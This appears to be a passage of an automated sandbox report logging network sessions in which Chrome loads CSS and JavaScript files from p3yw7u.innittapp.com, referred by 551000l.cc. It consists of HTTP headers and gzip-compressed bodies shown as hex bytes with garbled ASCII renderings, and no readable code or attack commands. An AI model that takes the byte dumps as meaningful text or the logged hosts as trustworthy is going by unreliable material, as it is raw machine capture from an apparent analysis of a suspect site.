                                          2025-01-12 00:17:28 UTC16384INData Raw: 37 b7 b7 b7 9f 7e fa e9 ab 57 af 6e ae 6e 43 08 c7 e3 49 dd aa 79 a6 d3 e9 14 63 e8 3a 8e cb c2 54 a7 ec 3f 4d 89 99 72 96 2c 49 32 73 58 34 ff 61 3c d9 d8 9d 1a 47 01 37 f2 99 ea 08 b5 af bb 39 95 3b 6e 8c a5 a9 35 d0 26 92 52 1a e7 49 9b ed 62 24 b8 f0 dc a2 87 fb fd fe 78 38 30 b3 2d 78 6a 12 ec 94 24 e7 29 e7 dc c5 f5 22 37 29 fb a7 72 59 86 15 0e f3 3c cf 92 bb ae 7b 7a 3c 86 48 5d 1c e6 34 9e 8e 53 88 14 28 86 c0 29 e9 34 1d 88 32 73 0c 41 34 40 c0 4b 42 2f 56 9f d7 7e 3d 9d a6 94 26 a2 30 0c 9d ed a9 e1 cc 63 ca 31 c6 be eb a5 c4 58 d5 a2 d8 ef f7 22 32 8e 23 51 5e 02 cd 92 76 bb dd dc ac df 7e 48 41 51 42 9f d3 21 9f ce c8 05 81 da 09 50 18 96 c4 6d b2 53 49 d1 85 10 82 49 0d 59 a5 95 6e 5c 59 35 63 5d 44 68 bd d7 aa 1a cb e6 00 ed a7 b6 8e bb 67
                                          Data Ascii: 7~WnnCIyc:T?Mr,I2sX4a<G79;n5&RIb$x80-xj$)"7)rY<{z<H]4S()42sA4@KB/V~=&0c1X"2#Q^v~HAQB!PmSIIYn\Y5c]Dhg


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          142192.168.2.449894103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC577OUTGET /ftl/commonPage/js/theme/default/layer.css?v=3.1.0 HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC689INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 3111
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: W/"6131d862-48e4"
                                          Date: Tue, 17 Dec 2024 04:38:40 GMT
                                          Last-Modified: Fri, 03 Sep 2021 08:10:10 GMT
                                          Expires: Thu, 16 Jan 2025 04:38:40 GMT
                                          Age: 2230727
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-12
                                          X-Cdn-Request-ID: 680e766728315a95992f62d93b6ca4ac
                                          2025-01-12 00:17:28 UTC3111INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 6b 6f db 38 f2 7b 7f 85 b0 45 81 24 57 79 25 cb ef a2 c0 b5 4d bb 57 60 81 03 16 7b 40 0f 77 87 40 b6 68 9b 88 2c 09 92 9c 38 3d ec 7f 3f 52 7c 88 6f d1 49 53 74 81 b3 1b bb e2 63 5e 1c ce 90 9c a1 47 79 fa 70 84 21 fa 04 75 08 0f bb 75 5a bf 0e 46 4a 61 0b db 20 55 8a db 74 ad 14 c0 36 07 41 53 a5 85 da b2 ab f8 ef 8b 00 bd 5a 70 6a c3 f2 0e d4 db bc bc 5f 05 20 cf 61 d5 c0 e6 4d 57 79 bf 87 2d 08 11 84 0d 58 05 45 79 5f a7 d5 8b 3f 5e bc d8 b7 87 3c 78 d9 41 dc 34 0d 01 4a c1 65 b0 a9 d0 33 6e 5d 00 02 a4 2a 1b d8 c2 b2 58 05 e9 ba 29 f3 63 4b cb ef 61 d6 ee 57 41 bc 5c 2c ab 13 06 2b d2 a8 50 dc ec d3 8c 51 dc c3 db c2 13 c8 08 b0 1b 1b 96 aa 84 45 8b 20 80 3b 50 b4 0d aa 3d b6 a5 8a 4c 02 df 96 d5 2a 88 48 e7 1c 6c
                                          Data Ascii: ko8{E$Wy%MW`{@w@h,8=?R|oIStc^Gyp!uuZFJa Ut6ASZpj_ aMWy-XEy_?^<xA4Je3n]*X)cKaWA\,+PQE ;P=L*Hl


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          143192.168.2.449895103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC388OUTGET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 3316
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"6260ddd4-2f13"
                                          Date: Sat, 28 Dec 2024 22:12:32 GMT
                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                          Expires: Mon, 27 Jan 2025 22:12:32 GMT
                                          Age: 1217095
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-06
                                          X-Cdn-Request-ID: 27bb23d4026137b8474bc74e264b4248
                                          2025-01-12 00:17:28 UTC3316INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 1a 6d 4f 1b 47 fa 3b bf 62 b3 3a 15 93 18 3b d5 7d 39 99 e3 ee c0 b8 0d d7 60 50 4c ee 94 8b 22 6b b1 07 70 6b 76 ad dd 75 38 94 22 39 b9 a4 21 ef d1 35 ef a5 5c 93 a6 29 6d 8f bc b4 55 42 08 6d 7e cc b1 6b f3 29 7f e1 9e 79 d9 d9 99 d9 5d 03 69 a5 ae 10 b6 67 e6 79 9d 67 9e b7 d9 ec fe fd 3d 1a fe cb f6 4c 37 cd 8a 5b b3 4c 6d ac 54 73 51 de 9a 43 ee 98 61 1b ee ac 65 a6 fa b4 53 3d 8b 3d 3d d1 99 4c c3 b6 5c cb 5d 68 20 6d 10 d6 f4 68 f0 64 f7 ef d7 3a 4f 5e f8 cf ce 78 d7 ce f8 37 9f 7a d7 af bc d9 bc e7 5d bf ec af 7d 85 09 e1 35 a5 63 c5 fc a1 23 e3 c5 d1 7f 14 ca 1f 14 8e e5 34 bd 5c 2a e7 c7 c7 0a 93 7a 9a 23 a1 20 5e 6b 13 83 2f 7d e6 bd da e8 bc 5e f1 af 72 24 f9 f1 62 b1 90 9f 1c 1d 2f 96 ff 36 74 f8 68 01 b0 e4
                                          Data Ascii: mOG;b:;}9`PL"kpkvu8"9!5\)mUBm~k)y]igyg=L7[LmTsQCaeS===L\]h mhd:O^x7z]}5c#4\*z# ^k/}^r$b/6th


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          144192.168.2.449896103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC562OUTGET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1421
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: W/"5d848f4f-1151"
                                          Date: Sun, 29 Dec 2024 01:25:21 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Tue, 28 Jan 2025 01:25:21 GMT
                                          Age: 1205526
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-12
                                          X-Cdn-Request-ID: 3fb2626ef7c2570063c420377f2502b8
                                          2025-01-12 00:17:28 UTC1421INData Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 18 6d 4f db 46 f8 af 30 2b ab 7c f1 61 92 4e fd 62 e7 82 da 75 1b 48 63 ac 6b b5 7e 40 08 39 f6 85 5c eb d8 c6 3e 43 3b d7 ff 7d cf bd 3b 38 30 98 b6 22 d5 dc 73 cf fb fb e1 af db 22 e5 ac 2c fc 09 ea 26 e1 ba 08 3f 7f 59 65 ef db 8a d6 67 49 7d d3 52 4a 2c 46 59 89 4f 83 ba db a4 3e 80 43 43 26 21 fd c2 69 91 f9 5d 8f f7 12 87 19 5d 27 6d ce 1b 6c 88 e3 9a f2 b6 2e 0e f8 86 35 21 4d d2 8d 6f f9 2b c6 93 ad 96 3b f1 05 0e 8a 05 f0 aa 49 eb 32 cf cf 57 9f 88 b9 0f af 29 f7 67 ea 5a dd 7e 74 77 77 2c e3 1b 7f 78 79 e2 2e 37 94 5d 6f b8 be 9d d0 9c 6e 69 c1 dd 75 ba 61 79 56 d3 c2 20 7c 66 19 58 aa d1 ee df 2a e6 ef d9 5f 94 cc 94 a6 fc 6b 45 89 f0 55 13 66 ac a6 d2 34 42 bc 9c ae b9 f7 ed db 08 5e 0b 5d 3c 74 3c 8f 66 03 86
                                          Data Ascii: mOF0+|aNbuHck~@9\>C;};80"s",&?YegI}RJ,FYO>CC&!i]]'ml.5!Mo+;I2W)gZ~tww,xy.7]oniuayV |fX*_kEUf4B^]<t<f


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          145192.168.2.449898103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC380OUTGET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC716INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 797
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"6260ddd4-828"
                                          Date: Sun, 29 Dec 2024 01:25:20 GMT
                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                          Expires: Tue, 28 Jan 2025 01:25:20 GMT
                                          Age: 1205527
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-08
                                          X-Cdn-Request-ID: d5eea8719cdaef4611a00961ed8dc461
                                          2025-01-12 00:17:28 UTC797INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 5b 4f d4 40 14 7e ef af 18 9b 0d ed c2 d2 35 31 f1 61 09 51 2e 2f 98 00 26 e0 93 31 64 b6 9d dd 2d f4 96 e9 94 4b 48 13 45 d1 0d 9a 80 09 8a 97 08 91 f8 60 8c c1 35 26 c8 65 f9 37 b4 85 27 ff 82 33 bd ec b6 cb 8a 3e f0 e0 79 99 ed 39 df 9c f3 f5 9c 6f a6 5b 71 0c 99 a8 a6 01 c6 a7 54 82 ee 9a d6 3d 4b cc 83 65 97 e3 da 0e c9 c2 26 31 c9 92 85 c0 20 58 e6 38 40 4d 51 a1 66 56 47 a0 a6 0d 43 79 ae 04 2a 49 1e 51 81 04 d2 0c 21 8a d9 3c c4 80 f9 26 cb b3 74 7b 4e b2 20 b6 d1 9d a9 c9 89 08 39 d0 02 ca a6 61 9b 1a 92 54 a3 62 8a fc d9 de ee f9 9b d5 e0 fb b1 b7 fd fc f4 e0 88 07 7d 49 16 c9 76 ca b6 8c d5 32 9a 66 94 fa 00 1f bc 7b 12 c3 57 0e fd cd 7d af de f0 f7 eb fe a3 6f bf 9a 2f fc fa 86 b7 b6 73 d6 78 1c 6c 7e f6 de
                                          Data Ascii: V[O@~51aQ./&1d-KHE`5&e7'3>y9o[qT=Ke&1 X8@MQfVGCy*IQ!<&t{N 9aTb}Iv2f{W}o/sxl~


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          146192.168.2.449897103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC563OUTGET /ftl/commonPage/js/jquery/jquery.nicescroll.min.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC719INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 17446
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"5d848f4f-fc8b"
                                          Date: Sun, 29 Dec 2024 00:01:06 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Tue, 28 Jan 2025 00:01:06 GMT
                                          Age: 1210581
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-06
                                          X-Cdn-Request-ID: 3a2b67f09a5aa5b0172afe3a7edf9b51
                                          2025-01-12 00:17:28 UTC15665INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 7d fd 77 db 46 92 e0 ef f7 57 48 d8 3d 3d c0 02 29 52 b2 9d 2c 68 88 2f 76 3c 37 7e 1b c7 d9 89 67 26 5e 8d 2e 0f 24 21 11 31 09 30 00 68 92 12 f9 bf 5f 7d f4 37 40 4a ca 64 66 f7 ee 9e 13 11 68 f4 47 75 75 75 75 55 75 75 f5 d9 b3 a3 3c 1b a7 d5 b8 2c 66 b3 a3 2f 17 dd af ba bd a3 77 f9 f2 53 f2 b9 4a 8e 3a 47 ef df 7d 84 bf d3 ba 5e 44 67 67 3a 67 37 29 d3 24 59 a4 65 9d 74 c7 c5 fc e8 d9 d9 ff 38 be 59 e6 e3 3a 2b 72 3f 0d ee 3d f9 e2 c5 71 bd 59 a4 c5 cd d1 24 bd c9 f2 f4 e4 84 7f bb c9 7c 32 e4 47 ff ca fb e5 d7 65 5a 6e bc eb 30 0d 22 af 18 fd 92 8e 6b 5d 30 5d 2f 8a b2 ae 86 f3 62 b2 9c a5 5d f1 1a a7 7e 99 fe ba cc ca d4 97 c5 83 20 4a fd 5f fe 03 9f 83 9d 6f 81 b3 ac d2 a3 aa 2e 33 a8 77 f0 25 29 8f 8a f8 b8 1f d6
                                          Data Ascii: }wFWH==)R,h/v<7~g&^.$!10h_}7@JdfhGuuuuUuu<,f/wSJ:G}^Dgg:g7)$Yet8Y:+r?=qY$|2GeZn0"k]0]/b]~ J_o.3w%)
                                          2025-01-12 00:17:28 UTC1781INData Raw: 69 7c 4f 1b 7a d1 fd 8e 4f a4 14 f1 95 f6 c2 c1 18 3f 0b f8 8b 07 e1 e0 e7 ee 1d 05 b9 0e 3d 34 87 dc 12 0a de 14 b3 a2 84 94 79 52 de 66 f9 47 ca cd cf e2 b0 bf 7c fd 8e ab e0 17 0e 32 70 1d 22 2d 0a 8f 4d 82 42 39 d0 95 e8 40 57 c8 23 0a c5 55 79 3d b0 a0 e6 ec e8 5e a7 ce 0c d5 f0 36 c4 3f 91 e7 ed 5a 32 ab 33 85 ca a5 59 c4 dc 0c db 32 ab 93 a1 2a 37 a7 34 b2 8b 43 81 7c d0 7e 25 2f ce 13 b1 18 3a d6 91 7b 3a 53 af b2 c8 90 0a 1d fb 78 fd 4e 06 b3 7a 4e 54 67 41 26 c9 35 ae 44 94 bb 40 a7 f9 78 b6 ab 99 ca b7 2e c9 4e dc cb 91 8d 64 23 43 4f 3a 62 79 91 47 9e 59 1e 05 90 e9 71 c0 95 5e c8 63 1e e5 a7 fd 5e 2f e4 d1 8b 7a 3b 96 1c 66 26 7e 5c 9a 50 9b 9f 9e 17 c7 b3 ed f6 8c 2c a0 ec 0a b5 2d 6f 47 c9 df 40 03 3f 12 ff fd 2d 50 49 f4 ef 6f 81 f0 d0 9a
                                          Data Ascii: i|OzO?=4yRfG|2p"-MB9@W#Uy=^6?Z23Y2*74C|~%/:{:SxNzNTgA&5D@x.Nd#CO:byGYq^c^/z;f&~\P,-oG@?-PIo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          147192.168.2.449901103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC588OUTGET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 7746
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"66cd4838-6caf"
                                          Date: Sat, 28 Dec 2024 22:12:32 GMT
                                          Last-Modified: Tue, 27 Aug 2024 03:30:00 GMT
                                          Expires: Mon, 27 Jan 2025 22:12:32 GMT
                                          Age: 1217093
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-04
                                          X-Cdn-Request-ID: 33a750dd84d76398840202369625ac3c
                                          2025-01-12 00:17:28 UTC7746INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 3d 6b 77 db c6 b1 df fb 2b 20 54 a1 01 13 22 25 27 6d 13 32 88 ea fa 71 9a 7b 92 34 37 71 d3 73 4a 32 bd 10 09 49 88 49 40 05 40 db 2a 89 fe ac fb 07 ee 1f bb f3 da 17 08 48 b2 d3 e6 b4 27 15 81 dd d9 d9 d9 d9 d9 d9 79 ec c2 e3 c7 47 bf f2 1e 7b 3f fd f7 36 2d 6f bd 1f 92 75 b6 4a ea ac c8 bd 6f d7 db ab 2c f7 de 9c 8d ce 3e 1e 9d 01 0c 82 5d d7 f5 cd 64 3c fe e9 ef 08 fd 46 03 8f 8a f2 6a 2c 20 cf 8a 9b db 32 bb ba ae bd 60 19 7a 4f 4e cf 3e f1 fe eb ff fe b7 cc bd bf 26 e9 e5 65 5a a6 25 42 7d 97 ae d3 a4 4a 57 de 36 5f a5 a5 57 5f a7 de d7 5f be f2 d6 d9 32 cd ab 14 20 c6 bf 0a 2e b7 f9 12 b1 07 97 c9 b2 2e ca db 70 97 5d 06 f5 ed 4d 5a 5c 7a ab f4 32 cb d3 38 8e 7d 05 e5 0f 06 5c 38 4a 36 ab 70 c7 cf c1 cc 67 5a fd 45
                                          Data Ascii: =kw+ T"%'m2q{47qsJ2II@@*H'yG{?6-ouJo,>]d<Fj, 2`zON>&eZ%B}JW6_W__2 ..p]MZ\z28}\8J6pgZE


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          148192.168.2.449899103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC586OUTGET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 4126
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-04
                                          ETag: W/"66cd4838-3a09"
                                          Date: Sun, 29 Dec 2024 01:25:21 GMT
                                          Last-Modified: Tue, 27 Aug 2024 03:30:00 GMT
                                          Expires: Tue, 28 Jan 2025 01:25:21 GMT
                                          Age: 1205526
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-04
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-12
                                          X-Cdn-Request-ID: f7ac7dd6948cf260009d02ea2d8eeadf
                                          2025-01-12 00:17:28 UTC4126INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1b ed 72 db 36 f2 55 6c 8e 2b 93 15 45 4b 76 d3 26 96 69 4f ea 38 4d 66 e2 f4 f3 7a 3f 24 a5 43 49 90 c4 86 22 15 92 72 e2 93 f8 22 f7 2c f7 4e f7 0a b7 1f 00 08 52 92 5d a7 be e9 fd 38 4f 1b 93 8b dd c5 62 bf 01 c2 f6 64 19 8f f2 30 89 ed 49 30 ca 93 f4 d6 59 85 13 3b bf 5d 88 64 b2 37 16 93 30 16 be ef 5b 0a cb 6a 34 18 e8 05 f3 b1 b3 e2 67 bb 67 fd fe 61 29 d2 5b cb 85 87 5f 83 28 1c 07 b9 b0 06 ae 62 59 88 28 13 2b f9 66 ff fe 23 e2 3a 45 61 eb b9 0f 9c 95 7a 86 49 a3 e7 51 f4 3a 1e 8b 4f 22 b3 e3 60 2e 9c 55 2a f2 65 1a ef e1 8b 97 8a 45 14 8c 84 7d d4 ef f5 c7 cd fe e0 68 ea 5a bd 81 e5 14 07 de 0d 4f 9d a4 5e 26 f2 17 62 12 2c a3 3c b3 57 22 4d 93 f4 32 0a b2 ec d4 9a 05 59 8b de 3b 96 fb 5e dc 2e 52 91 65 2f 44 14
                                          Data Ascii: r6Ul+EKv&iO8Mfz?$CI"r",NR]8Obd0I0Y;]d70[j4gga)[_(bY(+f#:EazIQ:O"`.U*eE}hZO^&b,<W"M2Y;^.Re/D


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          149192.168.2.449900103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC541OUTGET /ftl/commonPage/js/moment.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:28 UTC720INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 26968
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"64b633ca-1cab9"
                                          Date: Sun, 29 Dec 2024 11:26:17 GMT
                                          Last-Modified: Tue, 18 Jul 2023 06:40:10 GMT
                                          Expires: Tue, 28 Jan 2025 11:26:17 GMT
                                          Age: 1169470
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-07
                                          X-Cdn-Request-ID: bd518344f4c7ef653450c93f5650ef7f
